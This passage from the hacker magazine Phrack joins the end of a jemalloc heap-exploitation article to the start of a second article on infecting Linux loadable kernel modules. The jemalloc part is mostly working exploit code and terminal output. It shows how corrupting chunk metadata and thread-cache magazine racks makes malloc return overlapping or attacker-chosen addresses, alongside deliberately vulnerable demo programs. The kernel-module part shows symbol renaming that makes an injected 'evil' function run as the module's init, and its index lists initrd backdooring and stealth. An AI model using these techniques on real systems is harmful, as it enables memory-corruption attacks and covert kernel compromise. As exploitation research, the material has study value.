purpose that we are mostly interested in overwriting 'chunk->map[1]'
|
|
and not 'chunk->map[0]'. The second thing to catch our attention is
|
|
the fact that, at [3-19], 'size' is calculated directly from the 'bits'
|
|
element of the overwritten bitmap. This size is later converted to the
|
|
number of pages comprising it, so, the attacker can directly affect the
|
|
number of pages to be marked as free. Let's see 'arena_run_dalloc':
|
|
|
|
|
|
static void
|
|
arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty)
|
|
{
|
|
arena_chunk_t *chunk;
|
|
size_t size, run_ind, run_pages;
|
|
|
|
chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(run);
|
|
run_ind = (size_t)(((uintptr_t)run - (uintptr_t)chunk)
|
|
>> PAGE_SHIFT);
|
|
...
|
|
|
|
if ((chunk->map[run_ind].bits & CHUNK_MAP_LARGE) != 0)
|
|
size = chunk->map[run_ind].bits & ~PAGE_MASK;
|
|
else
|
|
...
|
|
run_pages = (size >> PAGE_SHIFT); /* [3-20] */
|
|
|
|
/* Mark pages as unallocated in the chunk map. */
|
|
if (dirty) {
|
|
size_t i;
|
|
|
|
for (i = 0; i < run_pages; i++) {
|
|
...
|
|
/* [3-21] */
|
|
chunk->map[run_ind + i].bits = CHUNK_MAP_DIRTY;
|
|
}
|
|
|
|
...
|
|
chunk->ndirty += run_pages;
|
|
arena->ndirty += run_pages;
|
|
}
|
|
else {
|
|
...
|
|
}
|
|
chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits &
|
|
PAGE_MASK);
|
|
chunk->map[run_ind+run_pages-1].bits = size |
|
|
(chunk->map[run_ind+run_pages-1].bits & PAGE_MASK);
|
|
|
|
|
|
/* Page coalescing code - Not relevant for _this_ example. */
|
|
...
|
|
|
|
/* Insert into runs_avail, now that coalescing is complete. */
|
|
/* [3-22] */
|
|
arena_avail_tree_insert(&arena->runs_avail, &chunk->map[run_ind]);
|
|
|
|
...
|
|
}
|
|
|
|
|
|
Continuing with our analysis, one can see that at [3-20] the same
|
|
size that was calculated in 'arena_dalloc_large()' is now converted
|
|
to a number of pages and then all 'map[]' elements that correspond to
|
|
these pages are marked as dirty (notice that 'dirty' argument given
|
|
to 'arena_run_dalloc()' by 'arena_dalloc_large()' is always set to
|
|
true). The rest of the 'arena_run_dalloc()' code, which is not shown
|
|
here, is responsible for forward and backward coalescing of dirty
|
|
pages. Although not directly relevant for our demonstration, it's
|
|
something that an attacker should keep in mind while developing a real
|
|
life reliable exploit.
|
|
|
|
Last but not least, it's interesting to note that, since the attacker
|
|
controls the 'arena' pointer, the map elements that correspond to the
|
|
freed pages are inserted in the given arena's red black tree. This can be
|
|
seen at [3-22] where 'arena_avail_tree_insert()' is actually called. One
|
|
may think that since red-black trees are involved in jemalloc, she can
|
|
abuse their pointer arithmetic to achieve a '4 bytes anywhere' write
|
|
primitive. We urge all interested readers to have a look at rb.h, the
|
|
file that contains the macro-based red black tree implementation used
|
|
by jemalloc (WARNING: don't try this while sober).
|
|
|
|
Summing up, our attack algorithm consists of the following steps:
|
|
|
|
1) Force the target application to perform a number of allocations until a
|
|
new arena is eventually allocated or until a neighboring arena is reached
|
|
(call it arena B). This is mostly meaningful for our demonstration codes,
|
|
since, in real-life applications, chances are that more than one chunk
|
|
and/or arena will already be available during the exploitation process.
|
|
|
|
2) Overwrite the 'arena' pointer of arena B's chunk and make it point
|
|
to an already existing arena. The address of the very first arena of
|
|
a process (call it arena A) is always fixed since it's declared as
|
|
static. This will prevent the allocator from accessing a bad address
|
|
and eventually segfaulting.
|
|
|
|
3) Force or let the target application free() any region that belongs to
|
|
arena B. We can deallocate any number of pages as long as they are marked
|
|
as allocated in the jemalloc metadata. Trying to free an unallocated page
|
|
will result in the red-black tree implementation of jemalloc entering
|
|
an endless loop or, rarely, segfaulting.
|
|
|
|
4) The next allocation to be served by arena B, will return a pointer
|
|
somewhere within the region that was erroneously free()'ed in step 3.
|
|
|
|
The exploit code for the vulnerable program presented in this section
|
|
can be seen below. It was coded on an x86 FreeBSD-8.2-RELEASE system, so
|
|
the offsets of the metadata may vary for your platform. Given the address
|
|
of an existing arena (arena A of step 2), it creates a file that contains
|
|
the exploitation vector. This file should be passed as argument to the
|
|
vulnerable target (full code in file exploit-chunk.c):
|
|
|
|
|
|
char buffer[1024], *p;
|
|
int fd;
|
|
|
|
if(argc != 2) {
|
|
fprintf(stderr, "%s <arena>\n", argv[0]);
|
|
return 0;
|
|
}
|
|
|
|
memset(buffer, 0, sizeof(buffer));
|
|
|
|
p = buffer;
|
|
strncpy(p, "1234567890123456", 16);
|
|
p += 16;
|
|
|
|
/* Arena address. */
|
|
*(size_t *)p = (size_t)strtoul(argv[1], NULL, 16);
|
|
p += sizeof(size_t);
|
|
|
|
/* Skip over rbtree metadata and 'chunk->map[0]'. */
|
|
strncpy(p,
|
|
"AAAA" "AAAA" "CCCC"
|
|
"AAAA" "AAAA" "AAAA" "GGGG" "HHHH" , 32);
|
|
|
|
p += 32;
|
|
|
|
*(size_t *)p = 0x00001002;
|
|
/* ^ CHUNK_MAP_LARGE */
|
|
/* ^ Number of pages to free (1 is ok). */
|
|
p += sizeof(size_t);
|
|
|
|
fd = open("exploit2.v", O_WRONLY | O_TRUNC | O_CREAT, 0700);
|
|
write(fd, buffer, (p - (char *)buffer));
|
|
close(fd);
|
|
return 0;
|
|
|
|
|
|
It is now time for some action. First, let's compile and run the vulnerable
|
|
code.
|
|
|
|
|
|
$ ./vuln-chunk
|
|
# Chunk 0x28200000 belongs to arena 0x8049d98
|
|
# Chunk 0x28300000 belongs to arena 0x8049d98
|
|
...
|
|
# Region at 0x28301030
|
|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
|
p3 = 0x28302000
|
|
# Region at 0x28301030
|
|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
|
|
|
|
|
The output is what one expects it to be. First, the vulnerable code forces
|
|
the allocator to initialize a new chunk (0x28300000) and then requests
|
|
a memory region which is given the address 0x28301030. The next call to
|
|
'malloc()' returns 0x28302000. So far so good. Let's feed our target
|
|
with the exploitation vector and see what happens.
|
|
|
|
$ ./exploit-chunk 0x8049d98
|
|
$ ./vuln-chunk exploit2.v
|
|
# Chunk 0x28200000 belongs to arena 0x8049d98
|
|
# Chunk 0x28300000 belongs to arena 0x8049d98
|
|
...
|
|
Read 56 bytes
|
|
# Region at 0x28301030
|
|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
|
p3 = 0x28301000
|
|
# Region at 0x28301030
|
|
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
|
|
|
|
As you can see the second call to 'malloc()' returns a new region
|
|
'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)!
|
|
|
|
Okay, so you're now probably wondering if this technique is useful. Please
|
|
note that the demonstration code presented in the previous two sections
|
|
was carefully coded to prepare the heap in a way that is convenient for
|
|
the attacker. This is why these attacks may seem obscure
|
|
at first. On the contrary, in real life applications, heap overflows in
|
|
jemalloc will result in one of the following three cases:
|
|
|
|
1) Overwrite of an adjacent memory region.
|
|
|
|
2) Overwrite of the run metadata (in case the overflown region is the
|
|
last in a run).
|
|
|
|
3) Overwrite of the arena chunk metadata (in case the overflown region
|
|
is the last in a chunk).
|
|
|
|
That said we believe we have covered most of the cases that an attacker
|
|
may encounter. Feel free to contact us if you think we have missed
|
|
something important.
|
|
|
|
|
|
------[ 3.3.3 - Thread caches (tcache_t)
|
|
|
|
As we have analyzed in 2.1.7, thread cache magazine 'rounds' and other
|
|
magazine metadata are placed in normal memory regions. Assuming a 'mag_t'
|
|
along with its void pointer array has a total size of N, one can easily
|
|
acquire a memory region in the same run by calling 'malloc(N)'.
|
|
|
|
Overflowing a memory region adjacent to a 'mag_t' can result in 'malloc()'
|
|
returning arbitrary attacker controlled addresses. It's just a matter of
|
|
overwriting 'nrounds' and the contents of the void pointer array to
|
|
contain a stack address (or any other address of interest). A careful
|
|
reader of section 2.1.7 would have probably noticed that the same result
|
|
can be achieved by giving 'nrounds' a sufficiently large value in order to
|
|
pivot in the stack (or any user controlled memory region). This scenario is
|
|
pretty straightforward to exploit, so, we will have a look at the case of
|
|
overwriting a 'mag_rack_t' instead (it's not that sophisticated either).
|
|
|
|
Magazine racks are allocated by 'mag_rack_create()':
|
|
|
|
|
|
mag_rack_t *
|
|
mag_rack_create(arena_t *arena)
|
|
{
|
|
...
|
|
return (arena_malloc_small(arena, sizeof(mag_rack_t) +
|
|
(sizeof(bin_mags_t) * (nbins - 1)), true));
|
|
}
|
|
|
|
|
|
Now, let's calculate the size of a magazine rack:
|
|
|
|
|
|
(gdb) print nbins
|
|
$6 = 30
|
|
(gdb) print sizeof(mag_rack_t) + (sizeof(bin_mags_t) * (nbins - 1))
|
|
$24 = 240
|
|
|
|
|
|
A size of 240 is actually serviced by the bin holding regions of 256 bytes.
|
|
Issuing calls to 'malloc(256)' will eventually end up in a user controlled
|
|
region physically bordering a 'mag_rack_t'. The following vulnerable code
|
|
emulates this situation (file vuln-mag.c):
|
|
|
|
|
|
/* The 'vulnerable' thread. */
|
|
void *vuln_thread_runner(void *arg) {
|
|
char *v;
|
|
|
|
v = (char *)malloc(256); /* [3-25] */
|
|
printf("[vuln] v = %p\n", v);
|
|
sleep(2);
|
|
|
|
if(arg)
|
|
strcpy(v, (char *)arg);
|
|
return NULL;
|
|
}
|
|
|
|
/* Other threads performing allocations. */
|
|
void *thread_runner(void *arg) {
|
|
size_t self = (size_t)pthread_self();
|
|
char *p1, *p2;
|
|
|
|
/* Allocation performed before the magazine rack is overflown. */
|
|
p1 = (char *)malloc(16);
|
|
printf("[%u] p1 = %p\n", self, p1);
|
|
sleep(4);
|
|
|
|
/* Allocation performed after overflowing the rack. */
|
|
p2 = (char *)malloc(16);
|
|
printf("[%u] p2 = %p\n", self, p2);
|
|
sleep(4);
|
|
return NULL;
|
|
}
|
|
|
|
int main(int argc, char *argv[]) {
|
|
size_t tcount, i;
|
|
pthread_t *tid, vid;
|
|
|
|
if(argc != 3) {
|
|
printf("%s <thread_count> <buff>\n", argv[0]);
|
|
return 0;
|
|
}
|
|
|
|
/* The fake 'mag_t' structure will be placed here. */
|
|
printf("[*] %p\n", getenv("FAKE_MAG_T"));
|
|
|
|
tcount = atoi(argv[1]);
|
|
tid = (pthread_t *)alloca(tcount * sizeof(pthread_t));
|
|
|
|
pthread_create(&vid, NULL, vuln_thread_runner, argv[2]);
|
|
for(i = 0; i < tcount; i++)
|
|
pthread_create(&tid[i], NULL, thread_runner, NULL);
|
|
|
|
pthread_join(vid, NULL);
|
|
for(i = 0; i < tcount; i++)
|
|
pthread_join(tid[i], NULL);
|
|
|
|
pthread_exit(NULL);
|
|
}
|
|
|
|
|
|
The vulnerable code spawns a so-called vulnerable thread that performs an
|
|
allocation of 256 bytes. The user-supplied 'argv[2]' is copied into it,
|
|
thus causing a heap overflow. A set of victim threads are then created. For
|
|
demonstration purposes, victim threads have a very limited lifetime; their
|
|
main purpose is to force jemalloc to initialize new 'mag_rack_t' structures.
|
|
As the comments indicate, the allocations stored in 'p1' variables take
|
|
place before the magazine rack is overflown while the ones stored in 'p2'
|
|
will get affected by the fake magazine rack (in fact, only one of them
|
|
will; the one serviced by the overflown rack). The allocations performed
|
|
by victim threads are serviced by the newly initialized magazine racks.
|
|
Since each magazine rack spans 256 bytes, it is highly possible that the
|
|
overflown region allocated by the vulnerable thread will lie somewhere
|
|
around one of them (this requires that both the target magazine rack and
|
|
the overflown region will be serviced by the same arena).
|
|
|
|
Once the attacker is able to corrupt a magazine rack, exploitation is just
|
|
a matter of overwriting the appropriate 'bin_mags' entry. The entry should
|
|
be corrupted in such a way that 'curmag' points to a fake 'mag_t'
|
|
structure. The attacker can choose to either use a large 'nrounds' value to
|
|
pivot into the stack, or give arbitrary addresses as members of the void
|
|
pointer array, preferably the latter. The exploitation code given below
|
|
makes use of the void pointer technique (file exploit-mag.c):
|
|
|
|
|
|
int main(int argc, char *argv[]) {
|
|
char fake_mag_t[12 + 1];
|
|
char buff[1024 + 1];
|
|
size_t i, fake_mag_t_p;
|
|
|
|
if(argc != 2) {
|
|
printf("%s <mag_t address>\n", argv[0]);
|
|
return 1;
|
|
}
|
|
fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16);
|
|
|
|
/* Please read this...
|
|
*
|
|
	 * In order to avoid using NULL bytes, we use 0xffffffff as the value
|
|
* for 'nrounds'. This will force jemalloc picking up 0x42424242 as
|
|
* a valid region pointer instead of 0x41414141 :)
|
|
*/
|
|
printf("[*] Assuming fake mag_t is at %p\n", (void *)fake_mag_t_p);
|
|
*(size_t *)&fake_mag_t[0] = 0x42424242;
|
|
*(size_t *)&fake_mag_t[4] = 0xffffffff;
|
|
*(size_t *)&fake_mag_t[8] = 0x41414141;
|
|
fake_mag_t[12] = 0;
|
|
setenv("FAKE_MAG_T", fake_mag_t, 1);
|
|
|
|
/* The buffer that will overwrite the victim 'mag_rack_t'. */
|
|
printf("[*] Preparing input buffer\n");
|
|
for(i = 0; i < 256; i++)
|
|
*(size_t *)&buff[4 * i] = (size_t)fake_mag_t_p;
|
|
buff[1024] = 0;
|
|
|
|
printf("[*] Executing the vulnerable program\n");
|
|
execl("./vuln-mag", "./vuln-mag", "16", buff, NULL);
|
|
perror("execl");
|
|
return 0;
|
|
}
|
|
|
|
|
|
Let's compile and run the exploit code:
|
|
|
|
|
|
$ ./exploit-mag
|
|
./exploit-mag <mag_t address>
|
|
$ ./exploit-mag 0xdeadbeef
|
|
[*] Assuming fake mag_t is at 0xdeadbeef
|
|
[*] Preparing input buffer
|
|
[*] Executing the vulnerable program
|
|
[*] 0xbfbfedd6
|
|
...
|
|
|
|
|
|
The vulnerable code reports that the environment variable 'FAKE_MAG_T'
|
|
containing our fake 'mag_t' structure is exported at 0xbfbfedd6.
|
|
|
|
|
|
$ ./exploit-mag 0xbfbfedd6
|
|
[*] Assuming fake mag_t is at 0xbfbfedd6
|
|
[*] Preparing input buffer
|
|
[*] Executing the vulnerable program
|
|
[*] 0xbfbfedd6
|
|
[vuln] v = 0x28311100
|
|
[673283456] p1 = 0x28317800
|
|
...
|
|
[673283456] p2 = 0x42424242
|
|
[673282496] p2 = 0x3d545f47
|
|
|
|
|
|
Neat. One of the victim threads, the one whose magazine rack is overflown,
|
|
returns an arbitrary address as a valid region. Overwriting the thread
|
|
caches is probably the most lethal attack but it suffers from a limitation
|
|
which we do not consider serious. The fact that the returned memory region
|
|
and the 'bin_mags[]' element both receive arbitrary addresses results in a
|
|
segfault either on the deallocation of 'p2' or once the thread dies by
|
|
explicitly or implicitly calling 'pthread_exit()'. Possible shellcodes
|
|
should be triggered _before_ the thread exits or the memory region is
|
|
freed. Fair enough... :)
|
|
|
|
|
|
--[ 4 - A real vulnerability
|
|
|
|
For a detailed case study on jemalloc heap overflows see the second Art of
|
|
Exploitation paper in this issue of Phrack.
|
|
|
|
|
|
--[ 5 - Future work
|
|
|
|
This paper is the first public treatment of jemalloc that we are aware
|
|
of. In the near future, we are planning to research how one can corrupt
|
|
the various red black trees used by jemalloc for housekeeping. The rbtree
|
|
implementation (defined in rb.h) is fully based on preprocessor macros
|
|
and it's quite complex in nature. Although we have already debugged them,
|
|
due to lack of time we didn't attempt to exploit the various tree
|
|
operations performed on rbtrees. We hope that someone will continue our
|
|
work from where we left off. If no one does, then you definitely know whose
|
|
articles you'll soon be reading :)
|
|
|
|
|
|
--[ 6 - Conclusion
|
|
|
|
We have taken the first step in analyzing jemalloc. We do know, however,
|
|
that we have not covered every possible way of corrupting the
|
|
allocator in a controllable way. We hope to have helped those that were
|
|
about to study the FreeBSD userspace allocator or the internals of Firefox
|
|
but wanted to have a first insight before doing so. Any reader that
|
|
discovers mistakes in our article is advised to contact us as soon as
|
|
possible and let us know.
|
|
|
|
Many thanks to the Phrack staff for their comments. Also, thanks to George
|
|
Argyros for reviewing this work and making insightful suggestions.
|
|
|
|
Finally, we would like to express our respect to Jason Evans for such a
|
|
leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of
|
|
the best (if not the best) allocators out there.
|
|
|
|
|
|
--[ 7 - References
|
|
|
|
[JESA] Standalone jemalloc
|
|
- http://www.canonware.com/cgi-bin/gitweb.cgi?p=jemalloc.git
|
|
|
|
[JEMF] Mozilla Firefox jemalloc
|
|
- http://hg.mozilla.org/mozilla-central/file/tip/memory/jemalloc
|
|
|
|
[JEFB] FreeBSD 8.2-RELEASE-i386 jemalloc
|
|
- http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libc/stdlib/
|
|
malloc.c?rev=1.183.2.5.4.1;content-type=text%2Fplain;
|
|
only_with_tag=RELENG_8_2_0_RELEASE
|
|
|
|
[JELX] Linux port of the FreeBSD jemalloc
|
|
- http://www.canonware.com/download/jemalloc/
|
|
jemalloc_linux_20080828a.tbz
|
|
|
|
[JE06] Jason Evans, A Scalable Concurrent malloc(3) Implementation for
|
|
FreeBSD
|
|
- http://people.freebsd.org/~jasone/jemalloc/bsdcan2006
|
|
/jemalloc.pdf
|
|
|
|
[PV10] Peter Vreugdenhil, Pwn2Own 2010 Windows 7 Internet Explorer 8
|
|
exploit
|
|
- http://vreugdenhilresearch.nl
|
|
/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
|
|
|
|
[FENG] Alexander Sotirov, Heap Feng Shui in Javascript
|
|
- http://www.phreedom.org/research/heap-feng-shui/
|
|
heap-feng-shui.html
|
|
|
|
[HOEJ] Mark Daniel, Jake Honoroff, Charlie Miller, Engineering Heap
|
|
Overflow Exploits with Javascript
|
|
- http://securityevaluators.com/files/papers/isewoot08.pdf
|
|
|
|
[CVRS] Chris Valasek, Ryan Smith, Exploitation in the Modern Era
|
|
(Blueprint)
|
|
- https://www.blackhat.com/html/bh-eu-11/
|
|
bh-eu-11-briefings.html#Valasek
|
|
|
|
[VPTR] rix, Smashing C++ VPTRs
|
|
- http://www.phrack.org/issues.html?issue=56&id=8
|
|
|
|
[HAPF] huku, argp, Patras Heap Massacre
|
|
- http://fosscomm.ceid.upatras.gr/
|
|
|
|
[APHN] argp, FreeBSD Kernel Massacre
|
|
- http://ph-neutral.darklab.org/previous/0x7db/talks.html
|
|
|
|
[UJEM] unmask_jemalloc
|
|
- https://github.com/argp/unmask_jemalloc
|
|
|
|
|
|
--[ 8 - Code
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0b of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------=[ Infecting loadable kernel modules ]=----------------=|
|
|
|=-------------------=[ kernel versions 2.6.x/3.0.x ]=-------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------------=[ by styx^ ]=-----------------------------=|
|
|
|=-----------------------=[ the.styx@gmail.com ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
---[ Index
|
|
|
|
|
|
1 - Introduction
|
|
|
|
2 - Kernel 2.4.x method
|
|
2.1 - First try
|
|
2.2 - LKM loading explanations
|
|
2.3 - The relocation process
|
|
|
|
3 - Playing with loadable kernel modules on 2.6.x/3.0.x
|
|
3.1 - A first example of code injection
|
|
|
|
4 - Real World: Is it so simple?
|
|
4.1 - Static functions
|
|
4.1.1 - Local symbol
|
|
4.1.2 - Changing symbol bind
|
|
4.1.3 - Try again
|
|
4.2 - Static __init functions
|
|
4.3 - What about cleanup_module
|
|
|
|
5 - Real life example
|
|
5.1 - Inject a kernel module in /etc/modules
|
|
5.2 - Backdooring initrd
|
|
|
|
6 - What about other systems?
|
|
6.1 - Solaris
|
|
6.1.1 - A basic example
|
|
6.1.2 - Playing with OS modules
|
|
6.1.3 - Keeping it stealthy
|
|
6.2 - *BSD
|
|
6.2.1 - FreeBSD - NetBSD - OpenBSD
|
|
|
|
7 - Conclusion
|
|
|
|
8 - References
|
|
|
|
9 - Codes
|
|
9.1 - Elfstrchange
|
|
9.2 - elfstrchange.patch
|
|
|
|
|
|
---[ 1 - Introduction
|
|
|
|
|
|
In Phrack #61 [1] truff introduced a new method to infect a loadable kernel
|
|
module on Linux kernel x86 2.4.x series. However, this method is currently
|
|
not compatible with the Linux kernel 2.6.x/3.0.x series due to the many
|
|
changes made in kernel internals. As a result, in order to infect a kernel
|
|
module, changing the name of symbols in .strtab section is not enough
|
|
anymore; the task has become a little bit trickier. In this article it
|
|
will be shown how to infect a kernel module on Linux kernel x86 2.6.*/3.0.x
|
|
series. All the methods discussed here have been tested on kernel version
|
|
2.6.35, 2.6.38 and 3.0.0 on Ubuntu 10.10, 11.04 and 11.10 and on kernel
|
|
version 2.6.18-238 on CentOS 5.6.
|
|
|
|
The proposed method has been tested only on 32-bit architectures: a 64-bit
|
|
adaptation is left as an exercise to the reader. Finally, I want to
|
|
clarify that this paper is not innovative; it is merely an update of
|
|
truff's paper.
|
|
|
|
|
|
---[ 2 - Kernel 2.4.x method
|
|
|
|
|
|
---[ 2.1 - First try
|
|
|
|
|
|
With the help of a simple example it will be explained why truff's method
|
|
is no longer valid: we are using the "elfstrchange" tool provided in his
|
|
paper. First, let's write a simple testing kernel module:
|
|
|
|
/****************** orig.c ***********************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
int evil(void) {
|
|
|
|
printk(KERN_ALERT "Init Inject!");
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
int init(void) {
|
|
|
|
printk(KERN_ALERT "Init Original!");
|
|
|
|
return 0;
|
|
}
|
|
|
|
void clean(void) {
|
|
|
|
printk(KERN_ALERT "Exit Original!");
|
|
|
|
return;
|
|
}
|
|
|
|
module_init(init);
|
|
module_exit(clean);
|
|
/****************** EOF **************************************************/
|
|
|
|
The module_init macro is used to register the initialization function of
|
|
the loadable kernel module: in other words, the function which is called
|
|
when the module is loaded, is the init() function. Reciprocally the
|
|
module_exit macro is used to register the termination function of the LKM
|
|
which means that in our example clean() will be invoked when the module is
|
|
unloaded. These macros can be seen as the constructor/destructor
|
|
declaration of the LKM object. A more exhaustive explanation can be found
|
|
in section 2.2.
|
|
|
|
Below is the associated Makefile:
|
|
|
|
/****************** Makefile *********************************************/
|
|
obj-m += orig.o
|
|
|
|
KDIR := /lib/modules/$(shell uname -r)/build
|
|
PWD := $(shell pwd)
|
|
|
|
default:
|
|
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
|
|
|
|
clean:
|
|
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) clean
|
|
/****************** EOF **************************************************/
|
|
|
|
Now the module can be compiled and the testing can start:
|
|
|
|
$ make
|
|
...
|
|
|
|
Truff noticed that altering the symbol names located in the .strtab section
|
|
was enough to fool the resolution mechanism of kernel v2.4. Indeed the
|
|
obj_find_symbol() function of modutils was looking for a specific symbol
|
|
("init_module") using its name [1]:
|
|
|
|
/*************************************************************************/
|
|
module->init = obj_symbol_final_value(f, obj_find_symbol(f,
|
|
SPFX "init_module"));
|
|
module->cleanup = obj_symbol_final_value(f, obj_find_symbol(f,
|
|
SPFX "cleanup_module"));
|
|
/*************************************************************************/
|
|
|
|
Let's have a look at the ELF symbol table of orig.ko:
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
orig.ko: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
|
|
...
|
|
|
|
00000040 g F .text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
We want to set up evil() as the initialization function instead of init().
|
|
Truff was doing it in two steps:
|
|
|
|
1. renaming init to dumm
|
|
2. renaming evil to init
|
|
|
|
This can easily be performed using his tool, "elfstrchange", slightly
|
|
bug-patched (see section 9):
|
|
|
|
$ ./elfstrchange orig.ko init dumm
|
|
[+] Symbol init located at 0xa91
|
|
[+] .strtab entry overwritten with dumm
|
|
|
|
$ ./elfstrchange orig.ko evil init
|
|
[+] Symbol evil located at 0xa4f
|
|
[+] .strtab entry overwritten with init
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
...
|
|
|
|
00000040 g F .text 0000001b init <-- evil()
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b dumm <-- init()
|
|
|
|
Now we're loading the module:
|
|
|
|
$ sudo insmod orig.ko
|
|
$ dmesg |tail
|
|
...
|
|
|
|
[ 2438.317831] Init Original!
|
|
|
|
As we can see the init() function is still invoked. Applying the same
|
|
method with "init_module" instead of init doesn't work either. In the next
|
|
subsection the reasons for this behaviour are explained.
|
|
|
|
|
|
---[ 2.2 - LKM loading explanations
|
|
|
|
|
|
In the above subsection I briefly mentioned the module_init and
|
|
module_exit macros. Now let's analyze them. In kernel v2.4 the entry and
|
|
exit functions of the LKMs were init_module() and cleanup_module(),
|
|
respectively. Nowadays, with kernel v2.6, the programmer can choose the
|
|
name he prefers for these functions using the module_init() and
|
|
module_exit() macros. These macros are defined in "include/linux/init.h"
|
|
[3]:
|
|
|
|
|
|
/*************************************************************************/
|
|
#ifndef MODULE
|
|
|
|
[...]
|
|
|
|
#else /* MODULE */
|
|
|
|
[...]
|
|
|
|
/* Each module must use one module_init(). */
|
|
#define module_init(initfn) \
|
|
static inline initcall_t __inittest(void) \
|
|
{ return initfn; } \
|
|
int init_module(void) __attribute__((alias(#initfn)));
|
|
|
|
/* This is only required if you want to be unloadable. */
|
|
#define module_exit(exitfn) \
|
|
static inline exitcall_t __exittest(void) \
|
|
{ return exitfn; } \
|
|
void cleanup_module(void) __attribute__((alias(#exitfn)));
|
|
|
|
[...]
|
|
|
|
#endif /*MODULE*/
|
|
/*************************************************************************/
|
|
|
|
|
|
We are only interested in the "loadable module" case, that is when MODULE
|
|
is defined. As you can see, init_module is always declared as an alias of
|
|
initfn, the argument of the module_init macro. As a result, the compiler
|
|
will always produce two symbols with the same value in the relocatable
|
|
object: one for initfn and one for "init_module". The same rule applies
|
|
to the termination function, if the unloading mechanism is compiled in
|
|
the kernel (that is if CONFIG_MODULE_UNLOAD is defined).
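A quick user-space experiment makes the aliasing visible. The snippet below
is not kernel code, just the same GCC attribute at work; the file and
function names are made up for the demo:

/*************************** alias-demo.c (sketch) ***********************/
/* Build and inspect with:
 *   $ gcc -c alias-demo.c && nm alias-demo.o
 * Both 'myinit' and 'init_module' show up at the same address: the alias
 * attribute simply adds a second name for the same code, which is exactly
 * what module_init() does for the module's real init function.
 */
#include <stdio.h>

static int myinit(void)
{
        printf("myinit called\n");
        return 0;
}

/* same trick as the module_init() macro */
int init_module(void) __attribute__((alias("myinit")));
/******************************** EOF ************************************/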
|
|
|
|
When a module is compiled, first the compiler creates an object file for
|
|
each source file, then it generates an additional generic source file,
|
|
compiles it and finally links all the relocatable objects together.
|
|
|
|
In the case of orig.ko, orig.mod.c is the file generated and compiled as
|
|
orig.mod.o. The orig.mod.c follows:
|
|
|
|
/*************************************************************************/
|
|
#include <linux/module.h>
|
|
#include <linux/vermagic.h>
|
|
#include <linux/compiler.h>
|
|
|
|
MODULE_INFO(vermagic, VERMAGIC_STRING);
|
|
|
|
struct module __this_module
|
|
__attribute__((section(".gnu.linkonce.this_module"))) = {
|
|
.name = KBUILD_MODNAME,
|
|
.init = init_module,
|
|
#ifdef CONFIG_MODULE_UNLOAD
|
|
.exit = cleanup_module,
|
|
#endif
|
|
.arch = MODULE_ARCH_INIT,
|
|
};
|
|
|
|
static const struct modversion_info ____versions[]
|
|
__used
|
|
__attribute__((section("__versions"))) = {
|
|
{ 0x4d5503c4, "module_layout" },
|
|
{ 0x50eedeb8, "printk" },
|
|
{ 0xb4390f9a, "mcount" },
|
|
};
|
|
|
|
static const char __module_depends[]
|
|
__used
|
|
__attribute__((section(".modinfo"))) =
|
|
"depends=";
|
|
|
|
|
|
MODULE_INFO(srcversion, "EE786261CA9F9F457DF0EB5");
|
|
/*************************************************************************/
|
|
|
|
This file declares and partially initializes a struct module which will be
|
|
stored in the ".gnu.linkonce.this_module" section of the object file. The
|
|
module struct is defined in "include/linux/module.h":
|
|
|
|
/*************************************************************************/
|
|
struct module
|
|
{
|
|
[...]
|
|
|
|
/* Unique handle for this module */
|
|
char name[MODULE_NAME_LEN];
|
|
|
|
[...]
|
|
|
|
/* Startup function. */
|
|
int (*init)(void);
|
|
|
|
[...]
|
|
|
|
/* Destruction function. */
|
|
void (*exit)(void);
|
|
|
|
[...]
|
|
};
|
|
/*************************************************************************/
|
|
|
|
So when the compiler auto-generates the C file, it always makes the .init
|
|
and .exit fields of the struct point to the functions "init_module" and
|
|
"cleanup_module". But the corresponding functions are not declared in this
|
|
C file so they are assumed external and their corresponding symbols are
|
|
declared undefined (*UND*):
|
|
|
|
$ objdump -t orig.mod.o
|
|
|
|
orig.mod.o: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
[...]
|
|
00000000 *UND* 00000000 init_module
|
|
00000000 *UND* 00000000 cleanup_module
|
|
|
|
When the linking with the other objects is performed, the linker is then
|
|
able to solve this issue thanks to the aliasing performed by the
|
|
module_init() and module_exit() macros.
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
00000000 g F .text 0000001b evil
|
|
